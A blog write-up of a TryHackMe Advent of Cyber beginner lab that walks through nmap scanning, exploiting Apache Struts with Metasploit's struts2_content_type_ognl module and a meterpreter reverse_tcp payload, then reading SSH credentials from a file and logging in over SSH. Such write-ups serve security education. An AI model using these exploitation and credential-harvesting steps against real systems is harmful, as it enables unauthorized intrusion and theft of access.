TryHackMe: Advent of Cyber [Day 10] Metasploit-a-ho-ho-ho

Room: Advent of Cyber

Difficulty: Beginner

“Hi, Lindsey here. I’ve been a great Elf all year, but there was one incident and now I think I’m on Santa’s naughty list.

What? You didn’t think us elves got presents too? Well we do and we get first pick of the pressies!

Can you help me hack into Santa’s system that keeps track of the naughty and nice people to see if I am on it?”

For this challenge you will have to deploy the VM from the question and then use either OpenVPN or the THM virtual Kali Machine (if you are a subscriber) to connect to it. If you need instructions for how to do that, click HERE.

#1 Compromise the web server using Metasploit. What is flag1?

First thing we need to do is get on our attacking machine (OpenVPN or Kali) and do an nmap scan. This will show us what ports are open, and a few other things. -sV finds the service version for what’s running on the ports, and -O tries to determine the operating system. All these details will help you when you are trying to find the correct exploit and lay the foundation for an attack.

nmap -sV -O <target ip address>

Here are the results:

Make sure to leave this open so you can refer to it or copy it to a text document.

Looks like we have three ports open. Port 22 (SSH) running OpenSSH 7.4, Port 80 (HTTP) With Apache Tomcat/Coyote JSP engine 1.1., and finally, Port 111. We know we need to find a way to get into the web server, Port 80, so let’s find an exploit for that.

Use your command line and type in the following to open up Metasploit :

msfconsole

Before we get too into that though, let’s use our browser to connect to that web server and see if we can find any more information.

Yes, this is exactly what Lindsay the Elf was talking about. At the top, I see we get redirected to /showcase.action. I Googled that and got the following results:

So this means we are probably looking for an exploit targeting Apache Struts.

Back to Metasploit. I used the following command to narrow down what I need:

search type:exploit name:Struts

When choosing an exploit, try to find a more recent one, because older ones might have been patched. You see we have some here that are ten years old!

It’s good to do as much research/enumeration as you can before you run your exploit, because in some cases you may only have one chance to get it right.

I actually recognize one of the exploits from the blog post in the source material, so I assume that will be the correct one. If you needed to do more research on certain exploits though, there are a couple good places to go.

HERE is the Exploit Database (take note of the CVE #):

HERE is the National Vulnerability Database:

And HERE is Mitre’s Common Vulnerabilities and Exposures Database

OK, so let’s get our chosen exploit loaded:

use <name of exploit>

or in our case:

use exploit/multi/http/struts2_content_type_ognl

Now we need to set some parameters. Let’s use:

show options

To set our target, we type:

set RHOSTS <target machine>

and then to set the target port, we type:

set RPORT <target port>

If you noticed earlier, Metasploit already chose a payload for us, which was linux/x64/meterpreter/reverse_tcp. That’s fine for our purposes. It will basically spawn a meterpreter shell you can use to traverse the target system.

If you needed to change it though, you could type “show payloads” and then “set payload <name of payload>”.

Look at it like this: The exploit is the rocket to get to your target, but the payload is what you are actually delivering.

Next, we need to make sure LPORT and LHOST are filled out. They were completed automatically for us in this case, using the THM Kali VM info:

LHOST is going to be your IP, and LPORT is the port you are using to listen with.

Lastly, lets set our TARGETURI:

set TARGETURI <web url path>

DOUBLE CHECK everything one more time!

show options

Does it all look good?

Now…the moment of truth. Type:

exploit

GREAT SUCCESS!

Let’s find out where we landed:

ls

Looks like a random directory.

Now, we need to find the flag. Meterpreter shells have their own set of rules, but you can type “shell” to spawn a more traditional one. In our case, we will, because the “find” command won’t work otherwise and I’d rather not slog through all of the directories.

Finding the flag:

find / 2>/dev/null | grep -i “flag1”

Exactly what we were looking for. Type “exit” to return to the Meterpreter shell. Then we can read the file:

cat /usr/local/tomcat/webapps/ROOT/ThisIsFlag1.txt

Good Job! Moving on.

Question #2 Now you’ve compromised the web server, get onto the main system. What is Santa’s SSH password?

Let’s look at all the users on this system to see if we can find Santa:

cd /home

ls

Looks like Santa is actually the only one here. Let’s change to his directory and check out what files he has:

cd santa

ls

Well, that was easy! lol.

Let’s open it up:

cat ssh-creds.txt

Question #3 Who is on line 148 of the naughty list?

We know the naughty list is on Santa’s system, and we just got the password for it, so let’s move over there and answer the next question. You can exit out of meterpreter by typing “exit” and then “exit” again to back out of Metasploit, or alternatively, just open up a new command line.

We will be connecting via SSH:

ssh santa@<target ip address>

Let’s check out the files:

ls

Once again, Santa makes this entirely too simple for us.

cat -n naughty_list.txt

We add the -n so that the lines of the output are numbered.

Near the bottom we have our flag!

Question #4 Who is on line 52 of the naughty list?

Same deal.

cat -n nice_list.txt

This was a fun challenge that helped me brush up on my Metaspoilt skills. I hope you enjoyed following along with me. Make sure to bookmark those exploit databases.

Happy Hacking! ❤

--

--

CTF Writeups to facilitate cyber education.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store